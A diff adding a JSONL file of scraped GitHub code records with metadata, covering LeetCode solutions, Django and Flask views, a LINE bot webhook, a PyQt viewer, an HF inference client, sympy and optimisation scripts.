diff --git "a/4862.jsonl" "b/4862.jsonl" new file mode 100644--- /dev/null +++ "b/4862.jsonl" @@ -0,0 +1,1890 @@ +{"seq_id":"72065045847","text":"#coding=utf-8\n\n# Given a string, your task is to count how many palindromic substrings in this string.\n#\n# The substrings with different start indexes or end indexes are counted as different substrings even they consist of same characters.\n#\n# Example 1:\n#\n# Input: \"abc\"\n# Output: 3\n# Explanation: Three palindromic strings: \"a\", \"b\", \"c\".\n#\n#\n# Example 2:\n#\n# Input: \"aaa\"\n# Output: 6\n# Explanation: Six palindromic strings: \"a\", \"a\", \"a\", \"aa\", \"aa\", \"aaa\".\n#\n#\n# Note:\n#\n# The input string length won't exceed 1000.\n\n# coding=utf-8\n# 2019-05-29 18:01:30\n\nclass Solution:\n def countSubstrings(self, s):\n res = [] # abbreviation of result\n for i in range(len(s)):\n # odd case\n self.helper(s, i, i, res)\n # even case\n self.helper(s, i, i + 1, res)\n return len(res)\n\n # the auxiliary function to pick out a palindrome\n def helper(self, s, l, r, res):\n while l >= 0 and r < len(s) and s[l] == s[r]:\n # it's very import and tricky to pass the result list in\n # because we have to record every palindrome\n res.append(s[l:r+1])\n l -= 1\n r += 1\n\n\nif __name__ == '__main__':\n s = Solution()\n test1 = 'aaa'\n # test1 = 'abc'\n res = s.countSubstrings(test1)\n print(res)\n","repo_name":"Confuced/happy_leetcode","sub_path":"todos/problem647_day530.py","file_name":"problem647_day530.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16724010346","text":"import pytest\nfrom model import SynthesizabilityModel\n\n@pytest.fixture()\ndef synthesizability_model():\n model = SynthesizabilityModel()\n return model\n\n@pytest.mark.parametrize(\n \"input_series\",\n [\n [\n \"MgV2O4\",\n \"MgV8O4\",\n \"MgV24O4\",\n ],\n [\n \"Li3(WO3)8\",\n \"Li3(W5O3)8\",\n \"Li3(W20O3)8\",\n ]\n ]\n)\n@pytest.mark.xfail(reason=\"Too hard for a random model!\")\ndef test_stoichiometric_monotonicity(input_series:str) -> None:\n predicted_values = [\n synthesizability_model.predict_single(input_val)\n for input_val in input_series\n ]\n\n assert predicted_values == sorted(predicted_values, reverse=True)\n\n@pytest.mark.parametrize(\n \"input_series\",\n [\n [\n \"MgV2O4\",\n \"O4MgV2\",\n \"V2MgO4\",\n ],\n [\n \"Li3(WO3)8\",\n \"(WO3)8Li3\",\n ]\n ]\n)\n@pytest.mark.xfail(reason=\"Too hard for a random model!\")\ndef test_atomic_order(input_series:str) -> None:\n predicted_values = [\n synthesizability_model.predict_single(input_val)\n for input_val in input_series\n ]\n\n assert max(predicted_values) - min(predicted_values) < 0.001","repo_name":"eddotman/mrs-s22-ds04-tutorial","sub_path":"02_testing_models/physicality_tests.py","file_name":"physicality_tests.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74951326808","text":"\ndef binaryGap(N):\n A = [i for i in range(32) if (N >> i) & 1]\n if len(A) < 2:\n return 0\n return max(A[i+1] - A[i] for i in range(len(A) - 1))\n\n\nanswer = binaryGap(1041)\nprint(answer)\n","repo_name":"dineshkumar12004/Leetcode-DSA-Practice","sub_path":"Python/BinaryGap.py","file_name":"BinaryGap.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"23447030591","text":"from django.shortcuts import render, redirect\nfrom .models import Post\nfrom .forms import PostModelForm, CommentModelForm\nfrom datetime import datetime\n\ndef index(request):\n context = {}\n posts = Post.objects.all()\n context['posts'] = posts\n return render(request, 'post/index.html', context)\n\ndef detail(request, post_id):\n context = {}\n context['posts'] = Post.objects.get(id=post_id)\n return render(request, 'post/detail.html', context)\n\ndef create(request):\n context = {}\n form = PostModelForm(request.POST)\n \n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return redirect('post:index')\n else:\n context['form'] = form\n return render(request, 'post/create.html', context)\n else:\n context['form'] = PostModelForm(initial={'date_created': datetime.now()})\n return render(request, 'post/create.html', context)\n\ndef comment(request, post_id):\n context = {}\n form = CommentModelForm(request.POST)\n context['form'] = CommentModelForm(initial={'date_created': datetime.now(), 'post': post_id})\n \n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return redirect('post:index')\n else:\n context['form'] = form\n return render(request, 'post/create.html', context)\n else:\n context['form'] = CommentModelForm(initial={'date_created': datetime.now(), 'post': post_id})\n return render(request, 'post/create.html', context)\n\ndef update(request, post_id):\n context = {}\n post = Post.objects.get(id=post_id)\n\n if request.method == 'POST':\n form = PostModelForm(request.POST, instance=post)\n if form.is_valid():\n form.save()\n return HttpResponse('Post updated')\n else:\n context['form'] = form\n render(request, 'post/update.html', context)\n else:\n context['form'] = PostModelForm(instance=post)\n return render(request, 'post/update.html', context)\n","repo_name":"jammaligad/midtermmaligad","sub_path":"post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29907697825","text":"#!/usr/bin/env python3\n#\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import (QApplication, QGroupBox, QGridLayout, QLabel, \n QHBoxLayout, QVBoxLayout, QSizePolicy, QWidget, QFrame)\nimport psutil\nimport datetime\n\nclass UserView(QWidget):\n def __init__(self, parent=None):\n super(UserView, self).__init__(parent)\n \n# self.setFixedSize(450, 280)\n self.mainLayout = QVBoxLayout() \n self.createUserGroup()\n self.mainLayout.addWidget(self.userGroupBox)\n self.setLayout(self.mainLayout)\n\n def updateShow(self):\n self.userGroupBox.deleteLater()\n self.createUserGroup()\n self.mainLayout.addWidget(self.userGroupBox)\n# self.update()\n\n def createUserGroup(self):\n self.userGroupBox = QGroupBox(\"用户登录信息\")\n self.userLayout = QGridLayout()\n self.userLayout.setRowStretch(100, 100)\n\n info = psutil.users()\n# print(len(psutil.users()))\n num = 1\n self.userLayout.addWidget(self.addLabel(\"登陆名\"), 0, 0)\n self.userLayout.addWidget(self.addLabel(\"登陆终端\"), 0, 1)\n self.userLayout.addWidget(self.addLabel(\"登陆主机\"), 0, 2)\n self.userLayout.addWidget(self.addLabel(\"登陆时间\"), 0, 3)\n for i in info:\n self.insertUser(i, num)\n num += 1\n self.userGroupBox.setLayout(self.userLayout)\n\n def addLabel(self, value):\n label = QLabel(value)\n label.setAlignment(Qt.AlignHCenter)\n return label\n\n def insertUser(self, user, num):\n self.userLayout.addWidget(self.addLine(user.name), num, 0)\n self.userLayout.addWidget(self.addLine(user.terminal), num, 1)\n self.userLayout.addWidget(self.addLine(user.host), num, 2)\n self.userLayout.addWidget(self.addLine(datetime.datetime.\\\n fromtimestamp(user.started).strftime(\"%Y-%m-%d %H:%M:%S\")), num, 3)\n\n def addLine(self, value):\n line = QLabel(value)\n line.setAlignment(Qt.AlignCenter)\n line.setSizePolicy(QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Maximum))\n line.setFrameStyle(QFrame.Panel | QFrame.Sunken)\n return line\n\nif __name__ == \"__main__\":\n import sys\n app = QApplication(sys.argv)\n user = UserView()\n user.show()\n sys.exit(app.exec_())\n\n","repo_name":"tianboarenjie/BIND-Management","sub_path":"UserView.py","file_name":"UserView.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22860139842","text":"import json\nimport requests\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.conf import settings\n \nfrom linebot import LineBotApi, WebhookParser\nfrom linebot.exceptions import InvalidSignatureError, LineBotApiError\nfrom linebot.models import MessageEvent, TextSendMessage, StickerMessage\n \nline_bot_api = LineBotApi(settings.LINE_CHANNEL_ACCESS_TOKEN)\nparser = WebhookParser(settings.LINE_CHANNEL_SECRET)\n\n\ndef get_gym_capacity():\n url = 'https://ntusportscenter.ntu.edu.tw/counter.txt'\n r = requests.get(url)\n if r.status_code == requests.codes.ok:\n r = json.loads(r.text)\n capacity = r['CounterData'][0]['innerCount'].split(';')[0]\n print(capacity)\n return f'體育館人數:{capacity}'\n else:\n return 'error occurs when fetch the data'\n\n\n\"\"\"\nNormally when you make a request via a form you want the form being submitted to your view to originate from your website and not come from some other domain. \nTo ensure that this happens, you can put a csrf token in your form for your view to recognize. \nIf you add @csrf_exempt to the top of your view, then you are basically telling the view that it doesn't need the token. \nThis is a security exemption that you should take seriously.\n\"\"\"\n@csrf_exempt\ndef callback(request):\n if request.method == 'POST':\n signature = request.META['HTTP_X_LINE_SIGNATURE']\n body = request.body.decode('utf-8')\n \n try:\n events = parser.parse(body, signature)\n except InvalidSignatureError:\n return HttpResponseForbidden()\n except LineBotApiError:\n return HttpResponseBadRequest()\n\n for event in events:\n if isinstance(event, MessageEvent) or isinstance(event, StickerMessage):\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=get_gym_capacity())\n )\n return HttpResponse()\n else:\n return HttpResponse()\n","repo_name":"KaiChen1008/NTU-Gym-Line-Bot-Integration","sub_path":"line-bot-server/bot-server/line-bot-server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"41085062087","text":"from typing import Optional\nfrom app.extensions.database import session\nfrom app.extensions.utils.log_helper import logger_\nfrom app.persistence.model.post_report_model import PostReportModel\nfrom core.domains.board.entity.report_entity import PostReportEntity\nfrom core.domains.report.dto.post_report_dto import CreatePostReportDto\n\nlogger = logger_.getLogger(__name__)\n\n\nclass ReportRepository:\n def create_post_report(\n self, dto: CreatePostReportDto\n ) -> Optional[PostReportEntity]:\n try:\n post_report = PostReportModel(\n post_id=dto.post_id,\n report_user_id=dto.report_user_id,\n status=dto.status,\n context=dto.status,\n confirm_admin_id=dto.confirm_admin_id,\n is_system_report=dto.is_system_report,\n )\n session.add(post_report)\n session.commit()\n\n return post_report.to_entity() if post_report else None\n except Exception as e:\n logger.error(\n f\"[ReportRepository][create_post_report] post_id : {dto.post_id} report_user_id : {dto.report_user_id} \"\n f\"error : {e}\"\n )\n session.rollback()\n return None\n\n def get_post_report(\n self, report_user_id: int, post_id\n ) -> Optional[PostReportEntity]:\n post_report = (\n session.query(PostReportModel)\n .filter_by(report_user_id=report_user_id, post_id=post_id)\n .first()\n )\n return post_report.to_entity() if post_report else None\n","repo_name":"copyNdpaste/rabbit","sub_path":"core/domains/report/repository/report_repository.py","file_name":"report_repository.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74665322648","text":"#conding:utf-8\nimport xlrd\nimport jieba\nimport re\n\n#停用词 列表\nstopwordSet = set()\npathstop = 'C://Users//zhangheng//Desktop//张芬数据分析//stopwords.txt'\nwith open(pathstop,'r',encoding='utf-8') as f:\n for line in f.readlines():\n line = line.strip()\n stopwordSet.add(line)\n\n\n\npath = 'C://Users//zhangheng//Desktop//张芬数据分析//400//17年7月至2月11日诉求数据.xlsx'\npathR = \"C://Users//zhangheng//Desktop//张芬数据分析//400//sanjifenlei.txt\"\npathBase = \"C://Users//zhangheng//Desktop//张芬数据分析//400//\"\nset = set()\ndata = xlrd.open_workbook(path)\ntable = data.sheets()[0]\nnrows = table.nrows\nprint(nrows)\nncols = table.ncols\nwith open(pathR,'r',encoding='utf-8') as f:\n for line in f.readlines():\n line = str(line.strip())\n array = line.split(\" \")\n if(len(array) == 2):\n leixing = array[0]\n set.add(leixing)\n\nfor leixing in set:\n #print(leixing)\n date_dict = {}\n for i in range(1, nrows):\n brand = str(table.row_values(i)[5]).strip().replace(\" \",\"\")\n print(brand)\n\n array = brand.split(\"-\")\n if(len(array) == 3 ):\n x = array[2]\n if(x == leixing):\n print(\"jinlaile \")\n question = str(table.row_values(i)[44]).strip().replace(\" \",\"\")\n print('question: ',question)\n question = re.sub(\"[0-9\\!\\%\\[\\]\\,\\。.]\", \"\", question)\n if len(question) > 1:\n seg_list = list(jieba.cut(question,cut_all = False))\n query = (','.join(seg_list)).replace(',',' ')\n #print(type(query))\n array = query.split(\" \")\n for x in iter(array):\n if(len(x)>1 and x not in stopwordSet):\n\n if x not in date_dict:\n date_dict[x] = 1\n else:\n date_dict[x] += 1\n\n\n\n print('date_dict: ',len(date_dict))\n date = sorted(date_dict.items(),key=lambda item:item[1],reverse=True)\n #以类型名 命名,\n leixingS = str(leixing).replace(\"/\",\"\")\n pathW = pathBase+str(leixingS)+\".txt\"\n print(pathW)\n w = open(pathW,'w',encoding='utf-8')\n\n for i in date:\n newline = str(i[0])+\" \"+str(i[1])\n w.write(newline)\n w.write(\"\\n\")\n w.flush()\n w.close()\n\n\n\n\n\n\n\n\n","repo_name":"LawLietzh/workspacePy","sub_path":"py/gongZuo/zhangfen_400/tf_TongJi.py","file_name":"tf_TongJi.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31525262079","text":"from flask import session, render_template, redirect, url_for, flash, abort, request\n\nfrom leaderboard import app, db\nfrom leaderboard.database import Downvote\nfrom leaderboard.filters import user_has_voted\n\n@app.route('/entry//downvote', methods=['GET'])\ndef downvote(id):\n\tif 'user_id' not in session:\n\t\tabort(401)\n\tif request.method == 'GET':\n\t\tif user_has_voted(session['user_id'], id):\n\t\t\tflash('you have already voted on this entry')\n\t\t\treturn redirect(url_for('leaderboard'))\n\t\telse:\n\t\t\tdownvote = Downvote(session['user_id'], id)\n\t\t\tdb.session.add(downvote)\n\t\t\tdb.session.commit()\n\t\t\tflash('downvoted entry')\n\t\t\treturn redirect(url_for('leaderboard'))","repo_name":"robclewley/flask-leaderboard","sub_path":"leaderboard/endpoints/downvote.py","file_name":"downvote.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31339956052","text":"import random\nimport requests\nfrom dsp.modules.hf import HFModel, openai_to_hf\nfrom dsp.modules.cache_utils import CacheMemory, NotebookCacheMemory, cache_turn_on\n\n# from dsp.modules.adapter import TurboAdapter, DavinciAdapter, LlamaAdapter\n\n\nclass HFClientTGI(HFModel):\n def __init__(self, model, port, url=\"http://future-hgx-1\", **kwargs):\n super().__init__(model=model, is_client=True)\n\n self.url = url\n self.ports = port if isinstance(port, list) else [port]\n\n self.headers = {\"Content-Type\": \"application/json\"}\n\n self.kwargs = {\n \"temperature\": 0.01,\n \"max_tokens\": 75,\n \"top_p\": 0.97,\n \"n\": 1,\n \"stop\": [\"\\n\", \"\\n\\n\"],\n **kwargs,\n }\n\n # print(self.kwargs)\n\n def _generate(self, prompt, **kwargs):\n kwargs = {**self.kwargs, **kwargs}\n\n payload = {\n \"inputs\": prompt,\n \"parameters\": {\n \"do_sample\": kwargs[\"n\"] > 1,\n \"best_of\": kwargs[\"n\"],\n \"details\": kwargs[\"n\"] > 1,\n # \"max_new_tokens\": kwargs.get('max_tokens', kwargs.get('max_new_tokens', 75)),\n # \"stop\": [\"\\n\", \"\\n\\n\"],\n **kwargs,\n }\n }\n\n payload[\"parameters\"] = openai_to_hf(**payload[\"parameters\"])\n\n payload[\"parameters\"][\"temperature\"] = max(\n 0.1, payload[\"parameters\"][\"temperature\"]\n )\n\n # print(payload['parameters'])\n\n # response = requests.post(self.url + \"/generate\", json=payload, headers=self.headers)\n\n response = send_hftgi_request_v01(f\"{self.url}:{random.Random().choice(self.ports)}\" + \"/generate\", url=self.url, ports=tuple(self.ports), json=payload, headers=self.headers)\n\n try:\n json_response = response.json()\n # completions = json_response[\"generated_text\"]\n\n completions = [json_response[\"generated_text\"]]\n\n if (\n \"details\" in json_response\n and \"best_of_sequences\" in json_response[\"details\"]\n ):\n completions += [\n x[\"generated_text\"]\n for x in json_response[\"details\"][\"best_of_sequences\"]\n ]\n\n response = {\"prompt\": prompt, \"choices\": [{\"text\": c} for c in completions]}\n return response\n except Exception as e:\n print(\"Failed to parse JSON response:\", response.text)\n raise Exception(\"Received invalid JSON response from server\")\n\n\n@CacheMemory.cache(ignore=['arg'])\ndef send_hftgi_request_v01(arg, url, ports, **kwargs):\n return requests.post(arg, **kwargs)\n\n@CacheMemory.cache\ndef send_hftgi_request_v00(arg, **kwargs):\n return requests.post(arg, **kwargs)\n\n\nclass ChatModuleClient(HFModel):\n def __init__(self, model, model_path):\n super().__init__(model=model, is_client=True)\n\n from mlc_chat import ChatModule\n from mlc_chat import ChatConfig\n\n self.cm = ChatModule(\n model=model, lib_path=model_path, chat_config=ChatConfig(conv_template=\"LM\")\n )\n\n def _generate(self, prompt, **kwargs):\n output = self.cm.generate(\n prompt=prompt,\n )\n try:\n completions = [{\"text\": output}]\n response = {\"prompt\": prompt, \"choices\": completions}\n return response\n except Exception as e:\n print(\"Failed to parse output:\", response.text)\n raise Exception(\"Received invalid output\")\n","repo_name":"ericmelz/dspy","sub_path":"dsp/modules/hf_client.py","file_name":"hf_client.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18094535839","text":"# Description: Main script for ingesting documents into the database.\nimport argparse\nfrom db.utils import VectorDB, ProcessDocument\n\ndef main(doc_id):\n \n vector_db = VectorDB()\n \n if doc_id not in vector_db.get_document_names():\n try:\n print(f\"Document {doc_id} does not exist in the database.\")\n vector_db.add_documents(\n ProcessDocument(f\"protocols/{doc_id}.pdf\").load_and_chunk()\n )\n except Exception as e:\n print(e)\n \nif __name__ == '__main__':\n argparse = argparse.ArgumentParser()\n argparse.add_argument('--doc_id', type=str, help='document id')\n argparse.add_argument('--file_path', type=str, help='document file path')\n \n args = argparse.parse_args()\n doc_id = args.doc_id\n file_path = args.file_path\n\n if doc_id is not None:\n main(doc_id)\n if file_path is not None:\n vector_db = VectorDB()\n raw_chunks = ProcessDocument(file_path).load_and_chunk(strategy=None)\n vector_db.add_documents(ProcessDocument(file_path).load_and_chunk())\n else:\n print(\"Please provide a document id or file path\")\n\n ","repo_name":"anshmaniaa/gpt_poc","sub_path":"ingestion/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"45358396088","text":"import tensorflow as tf\n\n\ndef safe_norm(s, axis=-1, epsilon=1e-7, keepdims=False, name=None):\n \"\"\"\n Computes the norm of some input tensor\n\n :param s: A 4-D tf.Tensor\n :param axis: An integer, axis on which to apply safe_norm\n :param epsilon: A float, used to avoid dividing by zero\n :param keepdims: If true, retains reduced dimensions with length 1.\n :return: A tensor, the norm of tensor s\n \"\"\"\n with tf.name_scope(name, default_name='safe_norm'):\n squared_norm = tf.reduce_sum(tf.square(s), axis=axis, keepdims=keepdims)\n return tf.sqrt(squared_norm + epsilon)\n\n\ndef squash(s_j, axis=-1, epsilon=1e-7, keepdims=True, name=None):\n \"\"\"\n Non-linearity squashing function\n\n The length of the capsule's activity vector represents the probability that the\n object it is detecting exists in the image and so we need to squash this vector\n to be in the range [0,1].\n\n Implementation ref: https://arxiv.org/abs/1710.09829\n\n Note that here we can't use tf.norm since the norm of the vector\n might be zero and so the training process will blow up with\n nans. Thus, we need to implement it manually in order to add an epsilon\n to tackle this problem.\n\n :param s_j: N-D tensor where the axis number of `axis` correspond to the activity vector dimension\n :param axis: An integer, the axis on which squashing is applied\n :param epsilon: A float, small number to avoid dividing by zero\n :param keepdims: A boolean, if True dimensions are not reduced\n :param name: A string, name of scope\n \"\"\"\n with tf.name_scope(name, default_name='squash'):\n # compute the norm of the vector s\n squared_norm = tf.reduce_sum(tf.square(s_j), axis=axis, keepdims=keepdims)\n s_j_norm = tf.sqrt(squared_norm + epsilon)\n s_j_unit_scale = s_j / s_j_norm # unit scaling (second part of the equation)\n add_scale = squared_norm / (1. + squared_norm) # additional scaling (first part of the equation)\n v_j = s_j_unit_scale * add_scale # element-wise product\n return v_j\n","repo_name":"mmz33/CapsNet","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38451648840","text":"import inspect\nfrom dataclasses import dataclass\nimport requests\nfrom abc import ABC, abstractmethod\n\n\nclass InstanceAttrNamesGetterMixin:\n def get_attr_names(self):\n names = [name for name in vars(self)\n if not inspect.ismethod(name)]\n return names\n\nclass DBRow(ABC):\n @abstractmethod\n def get_values_row(self):\n raise NotImplementedError()\n\n\n@dataclass\nclass Weather(DBRow, InstanceAttrNamesGetterMixin):\n name: str\n weather_description: str\n main_temp: str\n main_pressure: str\n main_humidity: str\n wind_speed: str\n\n @staticmethod\n def from_json(json):\n return Weather(\n name=json[\"name\"],\n weather_description=json[\"weather\"][0][\"description\"],\n main_temp=float(json[\"main\"][\"temp\"]),\n main_pressure=int(json[\"main\"][\"pressure\"]),\n main_humidity=int(json[\"main\"][\"humidity\"]),\n wind_speed=float(json[\"wind\"][\"speed\"])\n )\n\n def get_values_row(self):\n return (\n self.name, self.weather_description, self.main_temp, self.main_pressure, self.main_humidity, self.wind_speed)\n\n\nclass OpenWeatherApiClient:\n def __init__(self, api_key: str, base_url=''):\n self.api_key = api_key\n self.base_url = base_url\n\n def get_weather(self, city) -> Weather:\n params = {\"q\": city, \"appid\": self.api_key, 'units': 'metric'}\n json_dict = requests.get(self.base_url, params=params).json()\n return Weather.from_json(json_dict)\n\n\nif __name__ == '__main__':\n api_key = input('>')\n cities = [\"New York\", \"London\", \"Warsaw\"]\n apiClient = OpenWeatherApiClient(api_key)\n for city in cities:\n print(apiClient.get_weather(city).get_attr_names())\n\n","repo_name":"Adam3004/BITPython","sub_path":"6/zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29378547843","text":"import sympy as sp\nimport numpy as np\nfrom sympy import *\nimport os\nx = sp.Symbol('X')\ny = sp.Symbol('Y')\nos.system('cls')\n\ndef integral_environment():\n os.system('cls')\n print(\"Enter equation\")\n print(\"\")\n entry = input()\n [*entry]\n equation = [element for element in entry if element.strip()]\n\n def solver(function,var):\n answer = sp.integrate(function,var)\n return answer\n \n def variable_finder(entry):\n for element in entry:\n if element == 'X':\n variable = x\n return variable\n elif element == 'Y':\n variable = y\n return variable\n \n def separator(entry):\n operators = ['+','-','*','/']\n sublists = []\n current_sublist = []\n for element in entry:\n if element in operators:\n sublists.append(current_sublist)\n current_sublist = []\n sublists.append([element])\n else:\n current_sublist.append(element)\n sublists.append(current_sublist)\n return sublists\n \n def list_annihilator(entry):\n stringy = \"\"\n for element in entry:\n stringy += element\n return stringy\n \n def compiler(entry):\n exp = {'^':'**'}\n variables = {'X':'*X'}\n var = variable_finder(entry)\n separated_lists = separator(equation)\n\n result = []\n for i in separated_lists:\n if i[0] == '+' or i[0] == '-':\n continue\n else:\n list_term_1 = [exp['^'] if element == '^' else element for element in i]\n term = list_annihilator(list_term_1)\n result.append(solver(term, var))\n \n final_ret = \"\"\n for i in result:\n final_ret = final_ret + str(i)\n for z in separated_lists:\n if z[0] == '+' or z[0] == '-':\n final_ret = final_ret + z[0]\n separated_lists.remove(z)\n break\n else:\n continue\n return final_ret\n init_printing(use_unicode=False, wrap_line=False)\n print('')\n print(compiler(equation))\n print('')\n \nintegral_environment()","repo_name":"Naenaenoi/ACS","sub_path":"integration test.py","file_name":"integration test.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70633130008","text":"def spiralTraverse(matrix):\n array = []\n rowStart = 0\n rowEnd = len(matrix) - 1\n colStart = 0\n colEnd = len(matrix[0]) - 1\n\n while(rowStart <= rowEnd and colStart <= colEnd):\n for col in range(colStart, colEnd + 1):\n array.append(matrix[rowStart][col])\n \n for row in range(rowStart + 1, rowEnd + 1):\n array.append(matrix[row][colEnd])\n \n for col in reversed(range(colStart, colEnd)):\n array.append(matrix[rowEnd][col])\n\n for row in reversed(range(rowStart + 1, rowEnd)):\n array.append(matrix[row][colStart])\n\n rowStart += 1\n rowEnd -= 1\n colStart += 1\n colEnd -= 1\n\n return array\n\nprint(spiralTraverse([\n [1, 2, 3, 4],\n [12, 13, 14, 5],\n [11, 16, 15, 6],\n [10, 9, 8, 7]\n]))\n\nprint(spiralTraverse([[1]]))\n\n\n","repo_name":"Damoy/AlgoTraining","sub_path":"AlgoExpert/src2/python/SpiralTraverse.py","file_name":"SpiralTraverse.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11765770155","text":"#\n# file: fxy_gaussian_ga_tuned.py\n#\n# RTK, 19-Jun-2020\n# Last update: 22-Jun-2020\n#\n################################################################\n\nimport time\nimport os\nimport sys\nsys.path.append(\"../\")\n\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom GA import *\n\nfrom Bounds import *\nfrom RandomInitializer import *\n\nclass Objective:\n def Evaluate(self, p):\n return -5.0*np.exp(-0.5*((p[0]+2.2)**2/0.4+(p[1]-4.3)**2/0.4)) + \\\n -2.0*np.exp(-0.5*((p[0]-2.2)**2/0.4+(p[1]+4.3)**2/0.4))\n\n\ndef Dispersion(swarm, i, d): \n x,y = swarm.pos[:,0], swarm.pos[:,1]\n dx = x.max() - x.min()\n dy = y.max() - y.min()\n d[i] = (dx + dy) / 2.0 \n\ndef wdist(x,y):\n return np.sqrt((2.2-x)**2 + (-4.3-y)**2)\n\ndef rdist(x,y):\n return np.sqrt((-2.2-x)**2 + (4.3-y)**2)\n\n\ndef main():\n npart = 100\n miter = 100\n runs = 100\n\n b = Bounds([-6,-6],[6,6],enforce=\"resample\")\n obj = Objective()\n ri = RandomInitializer(npart=npart, ndim=2, bounds=b)\n\n v = np.zeros((runs,miter))\n for i in range(runs):\n b = Bounds([-6,-6],[6,6],enforce=\"resample\")\n ri = RandomInitializer(npart=npart, ndim=2, bounds=b)\n swarm = GA(obj=obj, npart=npart, ndim=2, max_iter=miter, init=ri, bounds=b, CR=0.3, F=0.4, top=0.2)\n swarm.Initialize()\n for j in range(miter):\n swarm.Step()\n res = swarm.Results()\n v[i,j] = res[\"gbest\"][-1]\n plt.plot(np.arange(miter)[::5],v.mean(axis=0)[::5], marker='o', linestyle='none', color='k')\n plt.plot(v.mean(axis=0), color='k')\n plt.xlabel('Generation')\n plt.ylabel('Swarm Best')\n plt.tight_layout(pad=0, w_pad=0, h_pad=0)\n plt.savefig(\"fxy_gaussian_ga_tuned_plot.png\", dpi=300)\n plt.close()\n print(\"Final minimum value %0.8f\" % (v.mean(axis=0)[-1],))\n print()\n\n\nif (__name__ == \"__main__\"):\n main()\n\n","repo_name":"umfundii/SwarmOptimization","sub_path":"basic/fxy_gaussian_ga_tuned.py","file_name":"fxy_gaussian_ga_tuned.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42456015041","text":"\"\"\"\nCrear una lista con el contenido de esta tabla de video juegos:\n\nACCION AVENTURA DEPORTES\nGTA ASSINS FIFA 21\nGOD CRASH PES 12\nPUGB POP MOTO GP 21\n\nMostrar esta info ordenada\n\n\"\"\"\n\ntabla = [\n {\n \"categoria\": \"ACCION\",\n \"juegos\": [\"GTA\", \"GOD\", \"PUGB\"]\n },\n {\n \"categoria\": \"AVENTURA\",\n \"juegos\": [\"ASSINS\", \"CRASH\", \"POP\"]\n },\n {\n \"categoria\": \"DEPORTES\",\n \"juegos\": [\"FIFA 21\", \"PES 12\", \"MOTO GP 21\"]\n }\n]\n\nfor categoria in tabla:\n print(f\"-------{categoria['categoria']}-------\")\n for juego in categoria['juegos']:\n print(juego)","repo_name":"at-hi/master-python","sub_path":"12-ejercicios/ejercicio6.py","file_name":"ejercicio6.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"347876940","text":"import cv2\nimport numpy as np\n\ndef bgr2gray(bgr):\n b, g, r = bgr[:, :, 2], bgr[:, :, 1], bgr[:, :, 0]\n gray = (0.1140 * b) + (0.5870 * g) + (0.2989 * r)\n return gray\n\nimage = cv2.imread('./naeun.jpg')\nimage = bgr2gray(image)\nimage = image.astype(np.uint8)\ncv2.imshow('picture',image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n","repo_name":"Nroot33/Computer_Graphic","sub_path":"week 1/RGB2GRAY.py","file_name":"RGB2GRAY.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38186815741","text":"class Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n temp = []\n curr = head\n while curr is not None:\n temp.append(curr.val)\n curr = curr.next\n return temp[::-1] == temp\n\n\n# Time O(N) Space O(N)\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n if head is None:\n return True\n\n 